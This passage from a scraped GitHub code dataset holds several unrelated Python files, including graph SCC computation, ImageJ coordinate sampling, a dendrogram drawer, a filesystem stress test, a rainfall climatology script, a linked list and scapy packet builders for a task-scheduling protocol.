compute_sscs.\"\"\"\n return heapq.nlargest(n, self.scc_heapq)\n\n def compute_sccs(self):\n \"\"\"First compute the finishing times and the resulting order of nodes\n via a DFS loop. 
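(This is Kosaraju's two-pass algorithm.) 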
Second use that new order to compute the SCCs and order\n them by their size.\"\"\"\n\n # Go through the given graph in reverse order, computing the finishing\n # times of each node, and create a second graph that uses the finishing\n # times as the IDs.\n i = self.length\n while i > 0:\n node = self.nodes[str(i)]\n if not node.explored:\n self.dfs_fin_times(str(i))\n i -= 1\n\n # Populate the edges of the nodes_by_fin_time\n for n in self.nodes.values():\n for e in n.edges:\n e_head_fin_time = self.nodes[e].fin_time\n self.nodes_by_fin_time[n.fin_time].add_edge(e_head_fin_time)\n\n # Use the nodes ordered by finishing times to calculate the SCCs.\n i = self.length\n while i > 0:\n self.leader_count = 0\n node = self.nodes_by_fin_time[str(i)]\n if not node.explored:\n self.dfs_leaders(str(i))\n\n heapq.heappush(self.scc_heapq, (self.leader_count, node.id))\n i -= 1\n\n def dfs_fin_times(self, start_node_id):\n curr_node = self.nodes[start_node_id]\n curr_node.mark_explored()\n for e in curr_node.rev_edges:\n if not self.nodes[e].explored:\n self.dfs_fin_times(e)\n\n self.fin_time += 1\n curr_node.fin_time = str(self.fin_time)\n self.nodes_by_fin_time[str(self.fin_time)] = Node(str(self.fin_time))\n\n def dfs_leaders(self, start_node_id):\n curr_node = self.nodes_by_fin_time[start_node_id]\n curr_node.mark_explored()\n for e in curr_node.edges:\n if not self.nodes_by_fin_time[e].explored:\n self.dfs_leaders(e)\n\n self.leader_count += 1\n","repo_name":"ceik/langunita","sub_path":"algorithms/graphs/scc_computation_with_recursion.py","file_name":"scc_computation_with_recursion.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27767652164","text":"import json\n\ndata = {'Analiza Matematyczna': {'Całki Oznaczone': (0, 120), 'Rachunek Różniczkowy': (1, 150)},\n 'Podstawy Informatyki': {'Maszyna Turinga': (0, 60), 'Synchronizacja Wątków': (1, 150)}}\n\nwith open('data.json', 'w') as fp:\n json.dump(data, fp)\n \nwith open('data.json', 'r') as fp:\n data2 = json.load(fp)\n \nfor i in data2.keys():\n print(i)\n print('='*50)","repo_name":"adeorvg/hackathon-HackYeah","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36659215659","text":"# python rand_points.py makePolygon(2528,552,2172,672,1960,832,1944,1056,1848,1396,1596,1884,1216,2332,1048,2616,712,2952,768,3000,1072,2976,1680,2948,2212,2952,2476,2916,2712,2720,2916,2192,2944,1716,2852,1032);\r\n\r\n#######################################\r\n# Parameters:\r\nNUMBER_OF_POINTS = input(\"Number of random squares: \") # Number of random coordinates to select\r\nSQUARE_WIDTH = input(\"Width/Height of squares in pixels: \") # Width/Height of square in pixels\r\nCOORDINATES = input(\"Enter makePolygon coordinates: \")\r\n\r\nBOX_SIZE = int(SQUARE_WIDTH)*0.5\r\n\r\n#######################################\r\n# read node list \r\nimport sys \r\n\r\nnodes=[]\r\n\r\nnode_line=COORDINATES.replace(\"makePolygon\",\"\").replace(\"(\",\"\").replace(\")\",\"\").replace(\";\",\"\")\r\ncols=node_line.split(',')\r\nfor i in range(0,len(cols),2):\r\n node=(float(cols[i]),float(cols[i+1]))\r\n nodes.append( node )\r\nnodes.append(nodes[0])\r\n\r\nx_list=[]\r\ny_list=[]\r\nfor node in nodes:\r\n x_list.append(node[0])\r\n y_list.append(node[1])\r\nMAX_WIDTH = max(x_list)\r\nMAX_HEIGHT = max(y_list)\r\n\r\n\r\n# add more nodes 
so the selected points are not too close to the border\r\nimport math \r\nedge_nodes=nodes\r\n\r\nwhile True:\r\n max_border_length =0\r\n for i in range(len(edge_nodes)-1):\r\n border_len = (edge_nodes[i][0] - edge_nodes[i+1][0])**2 \\\r\n +(edge_nodes[i][1] - edge_nodes[i+1][1])**2\r\n border_len = math.sqrt(border_len)\r\n \r\n if border_len > max_border_length:\r\n max_border_length = border_len\r\n \r\n if max_border_length < BOX_SIZE * 0.20:\r\n break\r\n \r\n new_edge_nodes=[]\r\n for i in range(len(edge_nodes)-1):\r\n new_edge_nodes.append(edge_nodes[i])\r\n border_len = (edge_nodes[i][0] - edge_nodes[i+1][0])**2 \\\r\n +(edge_nodes[i][1] - edge_nodes[i+1][1])**2\r\n border_len = math.sqrt(border_len)\r\n \r\n if border_len < BOX_SIZE * 0.20:\r\n continue \r\n \r\n middle_node= ( (edge_nodes[i][0]+edge_nodes[i+1][0]) * 0.5, \\\r\n (edge_nodes[i][1]+edge_nodes[i+1][1]) * 0.5 )\r\n new_edge_nodes.append(middle_node)\r\n \r\n new_edge_nodes.append(edge_nodes[-1])\r\n \r\n edge_nodes=new_edge_nodes\r\n\r\n# print 'done edge_nodes', len(edge_nodes) , max_border_length\r\n\r\n#######################################\r\n# generate the point coordinates\r\nimport random\r\npoints=[]\r\nwhile len(points) < int(NUMBER_OF_POINTS):\r\n cor_x=random.randrange(0,MAX_WIDTH)\r\n cor_y=random.randrange(0,MAX_HEIGHT)\r\n \r\n # the points should not be too close to each other\r\n is_overlapping=False\r\n for point in points:\r\n if cor_x > point[0]-BOX_SIZE*2 and cor_x < point[0]+BOX_SIZE*2 \\\r\n and cor_y > point[1]-BOX_SIZE*2 and cor_y < point[1]+BOX_SIZE*2 :\r\n is_overlapping=True\r\n break\r\n\t\t\t\t# centre of squares must be 2*500 px apart in x and y axis\r\n\t\r\n if is_overlapping:\r\n continue \r\n \r\n # the points should not be too close to the border\r\n for node in edge_nodes:\r\n if cor_x > node[0]-BOX_SIZE and cor_x < node[0]+BOX_SIZE \\\r\n and cor_y > node[1]-BOX_SIZE and cor_y < node[1]+BOX_SIZE :\r\n is_overlapping=True\r\n break;\r\n\t\t\t\t# centre of squares must be 500 px apart from border in x and y axis\r\n\t\r\n if is_overlapping:\r\n continue \r\n \r\n # the points should fall into the area\r\n is_oddNodes=False\r\n for i in range(len(nodes)-1):\r\n if ( nodes[i][1] < cor_y and nodes[i+1][1] >= cor_y ) or \\\r\n ( nodes[i][1] >=cor_y and nodes[i+1][1] < cor_y) :\r\n t_ratio = (cor_y - nodes[i][1]) / (nodes[i+1][1]-nodes[i][1])\r\n \r\n if nodes[i][0] + (nodes[i+1][0]-nodes[i][0])* t_ratio < cor_x:\r\n is_oddNodes = not is_oddNodes\r\n \r\n if not is_oddNodes:\r\n continue\r\n \r\n points.append( (cor_x,cor_y))\r\n\r\n#######################################\r\n# print the coordinates\r\nfor point in points:\r\n print(point[0],point[1])\r\n\r\ninput(\"Highlight coordinates and press Enter to add to clipboard. 
Press Enter again to close window.\")","repo_name":"yaumun/imagej-particle-analysis","sub_path":"Random_Coordinates.py","file_name":"Random_Coordinates.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14233059735","text":"import csv\nimport random\n\nnamefile = open(\"ddb+_bars.txt\", \"r\")\ncitystatefile = open(\"ddb+_city_state.txt\").read().splitlines()\naddrfile = open(\"formatted_address.txt\", \"r\")\nhoursfile = open(\"formatted_times.txt\", \"r\")\nphonefile = open(\"formatted_phone_num.txt\", \"r\")\n\nwith open('bars.csv', 'w') as csvfile:\n filewriter = csv.writer(csvfile, delimiter=',')\n name = []\n opening = []\n closing = []\n license_id = []\n phone_num = []\n street = []\n city = []\n state = []\n\n for nameline, hoursline, phoneline, addrline in zip(namefile, hoursfile, phonefile, addrfile):\n name.append(nameline)\n\n hours = hoursline.split(',')\n opening.append(hours[0])\n closing.append(hours[1])\n\n phone_num.append(phoneline)\n\n street.append(addrline)\n\n cityline = random.choice(citystatefile)\n cstate = cityline.split(\", \")\n city.append(cstate[0])\n state.append(cstate[1])\n lid = cstate[1] + str(random.randint(10000, 99999))\n license_id.append(lid)\n\n for x in range(0,len(name)):\n filewriter.writerow([name[x].strip(), opening[x].strip(), \n closing[x].strip(), license_id[x].strip(), \n phone_num[x].strip(), street[x].strip(), city[x].strip(), \n state[x].strip()])\n\nnamefile.close()\naddrfile.close()\nhoursfile.close()\nphonefile.close()","repo_name":"nrf17/Restaurant_Database","sub_path":"table_data/Source Code/formatting.py","file_name":"formatting.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1063018792","text":"from hierarchical_cluster import *\nfrom PIL import Image,ImageDraw\n\ndef drawdendprogram(clust, labels, jpeg='cluster.jpg'):\n # height and width\n h = getheight(clust) * 20\n w = 1200\n depth = getdepth(clust)\n\n # since the width is fixed, scale the distance values accordingly\n scaling = float(w - 150) / depth\n\n # create a new image with a white background\n img = Image.new('RGB', (w, h), (255, 255, 255))\n draw = ImageDraw.Draw(img)\n\n draw.line((0, h/2, 10, h/2), fill=(255, 0, 0))\n\n # draw the first node\n drawnode(draw, clust, 10, (h/2), scaling, labels)\n img.save(jpeg, 'JPEG')\n\ndef drawnode(draw, clust, x, y, scaling, labels):\n if clust.id < 0:\n h1 = getheight(clust.left) * 20\n h2 = getheight(clust.right) * 20\n top = y - (h1 + h2) / 2\n bottom = y + (h1 + h2) / 2\n # length of the line\n l1 = clust.distance * scaling\n # vertical line from this cluster down to its children\n draw.line((x, top + h1 / 2, x, bottom - h2 / 2), fill=(255, 0, 0))\n\n # horizontal line to the left node\n draw.line((x, top + h1 / 2, x + l1, top + h1 / 2), fill=(255, 0, 0))\n\n # horizontal line to the right node\n draw.line((x, bottom - h2 / 2, x + l1, bottom - h2 / 2), fill=(255, 0, 0))\n\n # recursively draw the left and right nodes\n drawnode(draw, clust.left, x + l1, top + h1 / 2, scaling, labels)\n drawnode(draw, clust.right, x + l1, bottom - h2 / 2, scaling, labels)\n else:\n # if this is a leaf node, draw its label\n draw.text((x + 5, y - 7), labels[clust.id], (0, 0, 0))","repo_name":"AzureCharles/Beginner-of-Python","sub_path":"generate_pic.py","file_name":"generate_pic.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29170309537","text":"import pytest\nimport os\n\n\n@pytest.mark.parametrize('limit_in_bytes,disk_size,fuzz_only_mount,fsstress_opts', [\n 
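# params: (memory cgroup limit in bytes, disk size, fuzz only the mount dir, fsstress args)\n 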
pytest.param(0, '1024MiB', False, ['-p', '1', '-n', '10000'], id='1024mb'),\n pytest.param(0, '1024MiB', True, ['-p', '1', '-n', '10000'], id='1024mb-onlymount'),\n pytest.param(0, '256MiB', False, ['-p', '1', '-n', '10000'], id='256mb'),\n pytest.param(0, '256MiB', True, ['-p', '1', '-n', '10000'], id='256mb-onlymount'),\n pytest.param(100 << 20, '1024MiB', True, ['-p', '1', '-n', '10000'], id='1024mb-onlymount-memcg'),\n])\ndef test_arc_fuse_fsstress(make_container, make_arc_repo, make_sd_disk, make_fs, find_bin, make_cgroup,\n limit_in_bytes, disk_size, fuzz_only_mount, fsstress_opts, logger):\n arc_bin = find_bin('arc')\n fsstress_bin = find_bin('fsstress')\n\n disk = make_sd_disk(size=disk_size, lbpu=1, delay=0)\n fs = make_fs(disk, fs_type='ext4', mkfs_opts=['-q', '-I', '256', '-b', '1024'])\n\n mount = fs + '/mount'\n store = fs + '/store'\n\n os.mkdir(mount)\n os.mkdir(store)\n\n make_arc_repo(mount=mount, store=store)\n\n cgroups = []\n if limit_in_bytes > 0:\n cg = make_cgroup('memory')\n cg['limit_in_bytes'] = limit_in_bytes\n cgroups.append(cg)\n\n task = make_container(cgroups=cgroups)\n\n task.check_call([arc_bin, 'mount', '-m', mount, '-S', store])\n assert os.path.exists(mount + '/README')\n\n task.check_call([fsstress_bin, '-d', mount] + fsstress_opts)\n if not fuzz_only_mount:\n task.check_call([fsstress_bin, '-d', store] + fsstress_opts)\n\n task.check_call([arc_bin, 'unmount', mount])\n assert not os.path.exists(mount + '/README')\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"infra/test/misc/test_arc_fuse.py","file_name":"test_arc_fuse.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4391331583","text":"\"\"\"Contains functions that read/write from a file.\"\"\"\n# All functions should be looked over in general for cleaner solutions.\n\n\ndef get_new_id(filename=\"user_stories.csv\", rowsep=\",r,\"):\n \"\"\"Return an integer based on how many stories there are in a file.\"\"\"\n try:\n with open(filename, \"r\") as open_file:\n file_data = open_file.readline()\n except FileNotFoundError:\n return 1\n else:\n if not file_data: # file_data == \"\"\n return 1\n file_data = file_data.split(rowsep)\n return len(file_data) + 1\n\n\ndef get_table(filename=\"user_stories.csv\", rowsep=\",r,\", colsep=\",c,\"):\n \"\"\"Read the content of a file and organize it into a table in the following fashion:\n Each row is a story, a row has:\n 0: ID (int),\n 1: Story title,\n 2: User story,\n 3: Acceptance criteria,\n 4: Business value (int),\n 5: Estimation (h) (float),\n 6: Status\n \"\"\"\n # For readability only. 
There are indexes in a list.\n identifier = 0\n buisness_val = 4\n estimation = 5\n\n try:\n with open(filename, \"r\") as open_file:\n file_data = open_file.readline()\n except FileNotFoundError:\n return False\n else:\n if not file_data:\n return False\n file_data = file_data.split(rowsep)\n table = []\n for row in file_data:\n table.append(row.split(colsep))\n for row in table:\n row[identifier] = int(row[identifier])\n row[buisness_val] = int(row[buisness_val])\n row[estimation] = float(row[estimation])\n # del identifier, buisness_val, estimation\n return table\n\n\ndef save_table(table, filename=\"user_stories.csv\", rowsep=\",r,\", colsep=\",c,\"):\n \"\"\"Save a table to a file.\"\"\"\n rows = []\n for row in table:\n row[0] = str(row[0])\n row[1] = str(row[1])\n row[2] = str(row[2])\n row[3] = str(row[3])\n row[4] = str(row[4])\n row[5] = str(row[5])\n row[6] = str(row[6])\n rows.append(colsep.join(row))\n file_data = rowsep.join(rows)\n with open(filename, \"w\") as open_file:\n open_file.write(file_data)\n\n\ndef update_story(table, story):\n \"\"\"Return an updated table. New story's ID must match an existing ones.\"\"\"\n idx = 0\n for i, row in enumerate(table):\n if row[0] == int(story[0]):\n idx = i\n break\n table[idx] = story\n return table\n\n\ndef del_story(table, story_id):\n \"\"\"Return an updated table. story_id must match an existing ID.\"\"\"\n found_row = False\n for i in range(len(table)):\n if not found_row:\n if table[i][0] == story_id:\n del table[i]\n found_row = i\n break\n for i in range(len(table)):\n if i >= found_row:\n table[i][0] -= 1\n return table\n","repo_name":"martonMeszaros/super-sprinter-3000-martonMeszaros","sub_path":"data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"5298746509","text":"import os\nfrom datetime import datetime, time, timedelta\nimport numpy as np\nimport pandas as pd\nimport metview as mv\n\n########################################################################################\n# CODE DESCRIPTION\n# 05_Compute_Climate_Rain_FR.py computes the climatology of rainfall events associated with flash floods.\n# Note: the code can take up 3 hours to run in serial.\n\n# INPUT PARAMETERS DESCRIPTION\n# Year (year, in YYYY format): year to consider.\n# Acc (number, in hours): accumulation to consider.\n# EFFCI_list (list of integers, from 1 to 10): EFFCI indexes to consider.\n# MagnitudeInPerc_Rain_Event_FR_list (list of integers, from 0 to 100): magnitude, in \n# percentile, of rainfall events that can potentially conduct to flash floods.\n# Climate_Percs (list of floats, from 0 to 100): list of percentiles to compute for the rainfall climatology.\n# Format_Climate_Percs (string): format in the output files for the climatology percentiles.\n# RegionName_list (list of strings): names for the domain's regions.\n# Git_repo (string): repository's local path.\n# FileIN_FR (string): relative path of the file containing the cleaned point point flood reports.\n# DirIN_FC (string): relative path of the directory containing the ecPoint rainfall forecasts.\n# DirOUT (string): relative path of the directory containing the rainfall climatology.\n\n# INPUT PARAMETERS\nYear = 2019\nAcc = 12\nEFFCI_list = [1,6,10]\nMagnitudeInPerc_Rain_Event_FR_list = [50, 75, 85, 90, 95, 98, 99]\nClimate_Percs = range(0,100)\nFormat_Climate_Percs = \"%d\"\nRegionName_list = [\"La Costa\",\"La 
Sierra\"]\nGit_repo=\"/ec/vol/ecpoint/mofp/PhD/Papers2Write/FlashFloods_Ecuador\"\nFileIN_FR = \"Data/Compute/01_Clean_PointFR/Ecu_FF_Hist_ECMWF.csv\"\nDirIN_FC = \"Data/Raw/FC/ecPoint\"\nDirOUT = \"Data/Compute/05_Climate_Rain_FR\"\n########################################################################################\n\n# Reading the cleaned point point flood reports for the considered year\nPointFR = pd.read_csv(Git_repo + \"/\" + FileIN_FR)\n\n# Creating the headers for the final .csv output files as a string (comma separated),\n# and the string that will define the values format for each column\nHeaders = \"Climate_Percentiles\"\nFormat = Format_Climate_Percs\nfor MagnitudeInPerc_Rain_Event_FR in MagnitudeInPerc_Rain_Event_FR_list:\n Headers = Headers + \",RainEvent_Magnitude_\" + str(MagnitudeInPerc_Rain_Event_FR) + \"th_Percentile\"\n Format = Format + \",%.2f\"\n\n# Computing the climatology of rainfall events associated with flash floods for a specific EFFCI index \nfor EFFCI in EFFCI_list:\n\n # Computing the climatology of rainfall events associated with flash floods for a specific region\n for RegionName in RegionName_list:\n\n print(\" \")\n print(\"Computing the rainfall climatologies for EFFCI: \" + str(EFFCI) + \", Region: \" + RegionName)\n\n # Extracting the point point flood reports for a specific year, EFFCI index and region\n PointFR_temp = PointFR.loc[(PointFR[\"year\"] == Year) & (PointFR[\"EFFCI\"] >= EFFCI) & (PointFR[\"Georegion\"] == RegionName)]\n\n # Extracting some parameters from the point point flood reports database\n lat_list = list(PointFR_temp[\"Y_DD\"])\n lon_list = list(PointFR_temp[\"X_DD\"])\n date_time_list = list(PointFR_temp[\"ReportDateTimeUTC\"])\n\n # Initializing the variable that will contain the rainfall events associated with the point point flood reports\n rain_event_FR = np.array(MagnitudeInPerc_Rain_Event_FR_list)\n\n # Computing the rainfall climatology\n for ind_PointFR in range(len(PointFR_temp)):\n \n print(\" - Considering point flood report n.\" + str(ind_PointFR+1) + \" of \" + str(len(PointFR_temp)))\n\n # Extracting the lat/lon coordinates and the date/time of single point point flood reports\n lat_temp = lat_list[ind_PointFR]\n lon_temp = lon_list[ind_PointFR]\n date_time_temp = datetime.strptime(date_time_list[ind_PointFR], \"%Y-%m-%d %H:%M:%S\")\n\n # Selecting the forecasts to read based on the report's time\n DateSTR_x = datetime.strftime(date_time_temp.date(), \"%Y%m%d\")\n DateSTR_1x = datetime.strftime(date_time_temp.date() - timedelta(days=1), \"%Y%m%d\")\n if date_time_temp.time() >= time(0,0) and date_time_temp.time() < time(6,0):\n FileIN_FC_list = [Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_1x + \"00/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_1x + \"_00_030.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_1x + \"12/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_1x + \"_12_018.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_x + \"00/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_x + \"_00_012.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_1x + \"12/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_1x + \"_12_024.grib\"]\n elif date_time_temp.time() >= time(6,0) and date_time_temp.time() < time(12,0):\n FileIN_FC_list = [Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_x + \"00/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_x + \"_00_012.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_1x + \"12/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_1x + \"_12_024.grib\",\n 
Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_x + \"00/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_x + \"_00_018.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_1x + \"12/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_1x + \"_12_030.grib\"]\n elif date_time_temp.time() >= time(12,0) and date_time_temp.time() < time(18,0):\n FileIN_FC_list = [Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_x + \"00/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_x + \"_00_018.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_1x + \"12/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_1x + \"_12_030.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_x + \"00/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_x + \"_00_024.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_x + \"12/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_x + \"_12_012.grib\"]\n else:\n FileIN_FC_list = [Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_x + \"00/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_x + \"_00_024.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_x + \"12/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_x + \"_12_012.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_x + \"00/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_x + \"_00_030.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_x + \"12/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_x + \"_12_018.grib\"]\n\n # Reading the forecasts and extracting the rainfall totals for the nearest gridpoint to the flood report\n fc_FR = []\n for ind_FC in range(len(FileIN_FC_list)):\n FileIN_FC = FileIN_FC_list[ind_FC]\n if os.path.isfile(FileIN_FC):\n fc = mv.read(FileIN_FC)\n fc_FR.extend(mv.nearest_gridpoint(fc, lat_temp, lon_temp))\n\n # Computing different magnitudes of rainfall events associated with the point flood reports\n rain_event_FR = np.vstack([rain_event_FR, np.percentile(np.array(fc_FR), MagnitudeInPerc_Rain_Event_FR_list)])\n\n # Computing the rainfall climatology for the different events' magnitudes\n climate_rain_FR = np.percentile(rain_event_FR[1:], Climate_Percs, axis=0) # eliminate the first row of values which come from the initialization of the variable\n\n # Adding a column at the beginning of the matrix to indicate the percentiles each column corresponds to\n climate_rain_FR = np.column_stack((np.array(Climate_Percs),climate_rain_FR))\n \n # Savin in a .csv file the climatology of rainfall events associated with flash floods\n DirOUT_temp= Git_repo + \"/\" + DirOUT + \"/\" + f\"{Acc:02d}\" + \"h/EFFCI\" + f\"{EFFCI:02d}\"\n FileNameOUT = \"Climate_Rain_FR_\" + f\"{Acc:02d}\" + \"h_EFFCI\" + f\"{EFFCI:02d}\" + \"_\" + RegionName.split()[1] + \".csv\"\n if not os.path.exists(DirOUT_temp):\n os.makedirs(DirOUT_temp)\n np.savetxt(DirOUT_temp + \"/\" + FileNameOUT, climate_rain_FR, delimiter=\",\", fmt=Format, header=Headers, comments='') ","repo_name":"Fatima-Papers/Verif_Flash_Floods_Ecuador","sub_path":"Scripts/Processed/05_Compute_Climate_Rain_FR.py","file_name":"05_Compute_Climate_Rain_FR.py","file_ext":"py","file_size_in_byte":9078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"12681556344","text":"class TheNode:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\nclass LinkedList:\n def __init__(self, value):\n new_node = TheNode(value)\n self.head = new_node\n self.tail = new_node\n self.length = 1\n\n def append(self, theValue):\n new_node = TheNode(theValue)\n if self.length == 0:\n self.head = new_node\n 
self.tail = new_node\n else:\n self.tail.next = new_node\n self.tail = new_node\n\n self.length += 1\n\n def popMeOut(self):\n if self.length == 0:\n return None\n\n pre = self.head\n temp = self.head\n\n while temp.next:\n pre = temp\n temp = temp.next\n\n self.tail = pre\n self.tail.next = None\n self.length -= 1\n\n if self.length == 0:\n self.head = None\n self.next = None\n\n return temp\n\n def popfirst(self):\n if self.length == 0:\n return None\n\n temp = self.head\n self.head = self.head.next\n temp.next = None\n self.length -= 1\n\n if self.length == 0:\n self.tail = None\n return temp\n\n def remove_me(self, index):\n if index < 0 or index >= self.length:\n return None\n if index == 0:\n return self.popfirst()\n if index == self.length - 1:\n return self.popMeOut()\n pre = self.get(index - 1)\n temp = pre.next\n pre.next = temp.next\n temp.next = None\n self.length -= 1\n return temp\n","repo_name":"Lemmynjash/datastructures_python_refresher","sub_path":"linked_list_v2/practical_remove.py","file_name":"practical_remove.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37326254961","text":"from random import randint\nimport scapy.all as scapy\n\nMDC_DEFAULT_PKT_SIZE = 64\n\nfield_dict = {'pkt_type': 1,\n 'cluster_id': 2,\n 'src_id': 2,\n 'dst_id': 2,\n 'q_len': 1,\n 'seq_num': 2}\n\nfield_cls_dict = {1: scapy.XByteField,\n 2: scapy.XShortField,\n 3: scapy.X3BytesField,\n 4: scapy.XIntField,\n 8: scapy.XLongField}\n\nSAQR_PORT = 1234\nETHER_IPV4_TYPE = 0x0800\n\nPKT_TYPE_NEW_TASK = 0x00\nPKT_TYPE_NEW_TASK_RANDOM = 0x01\nPKT_TYPE_TASK_DONE = 0x02\nPKT_TYPE_TASK_DONE_IDLE = 0x03\nPKT_TYPE_QUEUE_REMOVE = 0x04\nPKT_TYPE_SCAN_QUEUE_SIGNAL = 0x05\nPKT_TYPE_IDLE_SIGNAL = 0x06\nPKT_TYPE_QUEUE_SIGNAL = 0x07\nPKT_TYPE_PROBE_IDLE_QUEUE = 0x08\nPKT_TYPE_PROBE_IDLE_RESPONSE = 0x09\nPKT_TYPE_IDLE_REMOVE = 0x0a\nPKT_TYPE_QUEUE_SIGNAL_INIT = 0x0b\n\ndef get_field(name):\n exists = type(name) == str and name.lower() in field_dict\n if exists:\n field_size = field_dict[name.lower()]\n if field_size in field_cls_dict:\n cls = field_cls_dict[field_size]\n return cls(name.lower(), 0)\n raise ValueError('field_size is incorrect')\n raise ValueError('field is not supported')\n\nclass SaqrPacket(scapy.Packet):\n name = 'saqrPacket'\n fields_desc = [\n get_field('pkt_type'),\n get_field('cluster_id'),\n get_field('src_id'),\n get_field('dst_id'),\n get_field('q_len'),\n get_field('seq_num')\n ]\n\ndef get_random_ip_addresses():\n ip_list = [('100.168.1.1', '100.132.44.1'),\n ('72.67.48.53', '72.10.30.55'),\n ]\n rand_idx = randint(0, len(ip_list)-1)\n return ip_list[rand_idx]\n\ndef generate_load(length):\n load = ''\n for i in range(length):\n load += chr(randint(0, 255))\n return load\n\ndef make_eth_hdr(src_mac=None, dst_mac=None, ip_encap=False, **kwargs):\n hdr = scapy.Ether()\n hdr.type = ETHER_IPV4_TYPE\n if src_mac:\n hdr.src = src_mac\n if dst_mac:\n hdr.dst = dst_mac\n return hdr\n\ndef make_saqr_task_pkt(dst_ip, cluster_id, src_id, dst_id, q_len=0, seq_num=1000, pkt_len=128, **kwargs):\n eth_hdr = make_eth_hdr(**kwargs)\n saqr_hdr = SaqrPacket(pkt_type=PKT_TYPE_NEW_TASK, cluster_id=cluster_id, src_id=src_id, dst_id=dst_id, q_len=q_len, seq_num=seq_num)\n\n data_len = pkt_len - len(eth_hdr) - len(saqr_hdr)\n if data_len < 0:\n data_len = 0\n payload = generate_load(data_len)\n pkt = eth_hdr / scapy.IP(src='192.168.0.16', dst=dst_ip) / scapy.UDP(sport=SAQR_PORT, dport=SAQR_PORT, chksum=0) / 
saqr_hdr / payload\n return pkt\n\ndef make_saqr_probe_idle_pkt(dst_ip, cluster_id, src_id, dst_id, seq_num, q_len=0, **kwargs):\n eth_hdr = make_eth_hdr(**kwargs)\n \n saqr_hdr = SaqrPacket(pkt_type=PKT_TYPE_PROBE_IDLE_QUEUE, cluster_id=cluster_id, src_id=src_id, dst_id=dst_id, q_len=q_len, seq_num=seq_num)\n\n pkt = eth_hdr / scapy.IP(src='192.168.0.16', dst=dst_ip) / scapy.UDP(dport=SAQR_PORT, chksum=0) / saqr_hdr\n \n return pkt\n\ndef make_saqr_probe_idle_response_pkt(dst_ip, cluster_id, src_id, dst_id, seq_num, q_len, **kwargs):\n eth_hdr = make_eth_hdr(**kwargs)\n \n saqr_hdr = SaqrPacket(pkt_type=PKT_TYPE_PROBE_IDLE_RESPONSE, cluster_id=cluster_id, src_id=src_id, dst_id=dst_id, q_len=q_len, seq_num=seq_num)\n\n pkt = eth_hdr / scapy.IP(src='192.168.0.16', dst=dst_ip) / scapy.UDP(dport=SAQR_PORT, chksum=0) / saqr_hdr\n \n return pkt\n\ndef make_saqr_scan_queue_pkt(dst_ip, cluster_id, src_id, dst_id, seq_num, **kwargs):\n eth_hdr = make_eth_hdr(**kwargs)\n saqr_hdr = SaqrPacket(pkt_type=PKT_TYPE_SCAN_QUEUE_SIGNAL, cluster_id=cluster_id, src_id=src_id, dst_id=dst_id, q_len=0, seq_num=seq_num)\n pkt = eth_hdr / scapy.IP(src='192.168.0.16', dst=dst_ip) / scapy.UDP(dport=SAQR_PORT, chksum=0) / saqr_hdr\n return pkt\n\ndef make_saqr_queue_remove_pkt(dst_ip, cluster_id, src_id, dst_id, seq_num, 